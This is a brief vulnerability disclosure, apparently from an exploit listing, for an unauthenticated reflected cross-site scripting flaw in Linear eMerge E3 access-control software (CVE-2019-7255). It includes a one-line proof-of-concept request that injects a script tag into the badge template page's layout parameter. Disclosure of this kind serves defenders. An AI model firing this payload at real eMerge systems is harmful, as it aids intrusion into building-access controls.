Share
Linear eMerge E3 Unauthenticated Reflected XSS  
Affected version: <=1.00-06  
CVE: CVE-2019-7255  
Advisory: https://applied-risk.com/resources/ar-2019-005  
  
Discovered by Gjoko 'LiquidWorm' Krstic  
  
PoC:  
GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1